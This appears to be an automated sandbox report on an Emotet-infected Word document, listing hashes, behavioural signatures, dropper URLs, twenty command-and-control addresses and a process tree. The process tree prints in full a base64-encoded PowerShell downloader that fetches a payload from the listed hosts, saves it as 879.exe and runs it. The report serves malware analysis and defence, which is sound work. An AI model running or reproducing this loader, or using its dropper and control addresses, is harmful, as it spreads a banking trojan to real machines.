Analysis

  • max time kernel
    60s
  • max time network
    27s
  • platform
    windows7_x64
  • resource
    win7v200213
  • submitted
    14-02-2020 08:11

General

  • Target

    17c68efb5139dd5e1cd67aec86fd75f5f22885a5a45b8d6951e999a5967e4a54.doc

  • Size

    235KB

  • MD5

    b91830b586026b91af49a624d0df0605

  • SHA1

    3bdc4fe304c2c0642ccb0189c34ed20b91a80685

  • SHA256

    17c68efb5139dd5e1cd67aec86fd75f5f22885a5a45b8d6951e999a5967e4a54

  • SHA512

    b0761cc64aa420d24062e1d899b86c84c809445d6b8389264eee31f3cbcc57ba9d6008650bc636791551eabb319cc5c330f514f194221965d5c7366e6cf41fb4

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://ta-behesht.ir/images/Provx00a/

exe.dropper

http://tatcogroup.ir/wp-admin/UC/

exe.dropper

http://tcpartner.ru/wp-includes/nr8/

exe.dropper

http://tepcian.utcc.ac.th/wp-admin/SquR/

exe.dropper

http://ourproductreview.in/pokjbg746ihrtr/a1kzwc/

Extracted

Family

emotet

C2

71.126.247.90:80

98.239.119.52:80

80.86.91.91:8080

104.236.28.47:8080

47.155.214.239:443

180.92.239.110:8080

87.106.136.232:8080

76.104.80.47:80

173.16.62.227:80

92.222.216.44:8080

47.153.183.211:80

74.130.83.133:80

47.156.70.145:80

110.36.217.66:8080

160.16.215.66:8080

200.116.145.225:443

181.13.24.82:80

24.94.237.248:80

5.32.55.214:80

31.172.240.91:8080

rsa_pubkey.plain

Signatures

  • Suspicious behavior: EmotetMutantsSpam 2 IoCs
  • Modifies registry class 280 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Drops file in System32 directory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\17c68efb5139dd5e1cd67aec86fd75f5f22885a5a45b8d6951e999a5967e4a54.doc"
    1⤵
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1988
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABFAHYAaQB6AGsAbAByAGwAPQAnAFoAcAB4AGwAbQBwAGoAZQBzAGYAdQAnADsAJABOAGEAegBjAHkAagB0AGIAdABiAGgAdwBqACAAPQAgACcAOAA3ADkAJwA7ACQAUABqAGkAZwB6AGcAeQBpAHUAawB4AHYAegA9ACcATAB2AHAAYgBwAHoAdQB3AHEAaABsAHkAJwA7ACQARABqAGEAYQBvAHUAcwB3AG4AYgByAGgAeQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATgBhAHoAYwB5AGoAdABiAHQAYgBoAHcAagArACcALgBlAHgAZQAnADsAJABXAGkAaABpAGoAawBiAGQAbABsAHIAPQAnAFYAbQBuAHEAcQBrAG0AaABrAGYAdgB4ACcAOwAkAEsAcQB2AGYAbwB4AHkAcABlAHoAPQAmACgAJwBuAGUAdwAnACsAJwAtAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AVwBlAGIAYwBMAEkARQBOAFQAOwAkAEEAbABnAHkAbwB2AHMAbQBuAGkAcgBsAGwAPQAnAGgAdAB0AHAAOgAvAC8AdABhAC0AYgBlAGgAZQBzAGgAdAAuAGkAcgAvAGkAbQBhAGcAZQBzAC8AUAByAG8AdgB4ADAAMABhAC8AKgBoAHQAdABwADoALwAvAHQAYQB0AGMAbwBnAHIAbwB1AHAALgBpAHIALwB3AHAALQBhAGQAbQBpAG4ALwBVAEMALwAqAGgAdAB0AHAAOgAvAC8AdABjAHAAYQByAHQAbgBlAHIALgByAHUALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBuAHIAOAAvACoAaAB0AHQAcAA6AC8ALwB0AGUAcABjAGkAYQBuAC4AdQB0AGMAYwAuAGEAYwAuAHQAaAAvAHcAcAAtAGEAZABtAGkAbgAvAFMAcQB1AFIALwAqAGgAdAB0AHAAOgAvAC8AbwB1AHIAcAByAG8AZAB1AGMAdAByAGUAdgBpAGUAdwAuAGkAbgAvAHAAbwBrAGoAYgBnADcANAA2AGkAaAByAHQAcgAvAGEAMQBrAHoAdwBjAC8AJwAuACIAcwBQAGAAbABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABNAHIAeQBuAGkAaABxAHgAYwBxAG4AcAA9ACcASABrAGQAawB6AGgAegBrAGMAcgB2ACcAOwBmAG8AcgBlAGEAYwBoACgAJABYAGgAaQBwAHMAdgB3AHAAIABpAG4AIAAkAEEAbABnAHkAbwB2AHMAbQBuAGkAcgBsAGwAKQB7AHQAcgB5AHsAJABLAHEAdgBmAG8AeAB5AHAAZQB6AC4AIgBkAE8AdwBuAEwAYABPAGAAQQBEAEYASQBsAGUAIgAoACQAWABoAGkAcABzAHYAdwBwACwAIAAkAEQAagBhAGEAbwB1AHMAdwBuAGIAcgBoAHkAKQA7ACQASgBtAGMAbABrAGoAcQBwAD0AJwBYAGkAaQBhAHgAawB3AGMAYQB3ACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJACcAKwAnAHQAZQBtACcAKQAgACQARABqAGEAYQBvAHUAcwB3AG4AYgByAGgAeQApAC4AIgBMAGUAYABOAGcAVABoACIAIAAtAGcAZQAgADMANwA0ADMAMgApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAQwBSAEUAYABBAFQAZQAiACgAJABEAGoAYQBhAG8AdQBzAHcAbgBiAHIAaAB5ACkAOwAkAEMAawB4AHMAdQBjAG8AaABzAHQAYwBoAGwAPQAnAEMAZwB4AGEAdgB4AGYAYgByACcAOwBiAHIAZQBhAGsAOwAkAFoAZwBvAHYAcgBoAGoAbQA9ACcATQBxAHYAbgB4AGYAZgBvACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAE0AbAByAHoAdAB6AHYAZQBjAHcAagBnAD0AJwBDAGkAcwB3AGMAdgB4AHkAegBlAHEAcQAnAA==
    1⤵
    • Process spawned unexpected child process
    • Suspicious behavior: EnumeratesProcesses
    • Blacklisted process makes network request
    • Suspicious use of AdjustPrivilegeToken
    • Drops file in System32 directory
    PID:1368
  • C:\Users\Admin\879.exe
    C:\Users\Admin\879.exe
    1⤵
    • Suspicious behavior: EmotetMutantsSpam
    • Executes dropped EXE
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    PID:1052
    • C:\Windows\SysWOW64\wextract\wextract.exe
      "C:\Windows\SysWOW64\wextract\wextract.exe"
      2⤵
      • Suspicious behavior: EmotetMutantsSpam
      • Suspicious behavior: EnumeratesProcesses
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      PID:1520

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\879.exe
  • C:\Users\Admin\879.exe
  • C:\Windows\SysWOW64\wextract\wextract.exe
  • memory/1052-189-0x00000000003F0000-0x00000000003FC000-memory.dmp
    Filesize

    48KB

  • memory/1052-190-0x0000000000400000-0x00000000004F7000-memory.dmp
    Filesize

    988KB

  • memory/1520-193-0x0000000000400000-0x00000000004F7000-memory.dmp
    Filesize

    988KB

  • memory/1520-192-0x0000000000370000-0x000000000037C000-memory.dmp
    Filesize

    48KB

  • memory/1988-81-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-11-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-5-0x000000000AF90000-0x000000000AF94000-memory.dmp
    Filesize

    16KB

  • memory/1988-6-0x000000000C010000-0x000000000C014000-memory.dmp
    Filesize

    16KB

  • memory/1988-7-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-9-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-10-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-89-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-12-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-14-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-16-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-18-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-20-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-22-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-24-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-26-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-28-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-30-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-32-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-34-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-36-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-38-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-40-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-42-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-44-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-46-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-48-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-49-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-50-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-51-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-52-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-53-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-55-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-57-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-59-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-61-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-63-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-65-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-67-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-69-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-71-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-73-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-75-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-77-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-79-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-3-0x00000000070D0000-0x00000000072D0000-memory.dmp
    Filesize

    2.0MB

  • memory/1988-83-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-85-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-131-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-4-0x00000000070D0000-0x00000000072D0000-memory.dmp
    Filesize

    2.0MB

  • memory/1988-111-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-93-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-95-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-97-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-99-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-101-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-103-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-105-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-107-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-109-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-91-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-113-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-115-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-117-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-119-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-121-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-123-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-125-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-127-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-129-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-87-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-133-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-135-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-137-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-139-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-141-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-143-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-145-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-147-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-149-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-151-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-153-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-155-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-157-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-159-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-161-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-163-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-165-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-167-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-169-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-171-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-173-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-175-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-2-0x0000000008940000-0x0000000008944000-memory.dmp
    Filesize

    16KB

  • memory/1988-0-0x0000000005DE0000-0x0000000005EE0000-memory.dmp
    Filesize

    1024KB

  • memory/1988-177-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-179-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-181-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-183-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB

  • memory/1988-185-0x0000000002180000-0x0000000002181000-memory.dmp
    Filesize

    4KB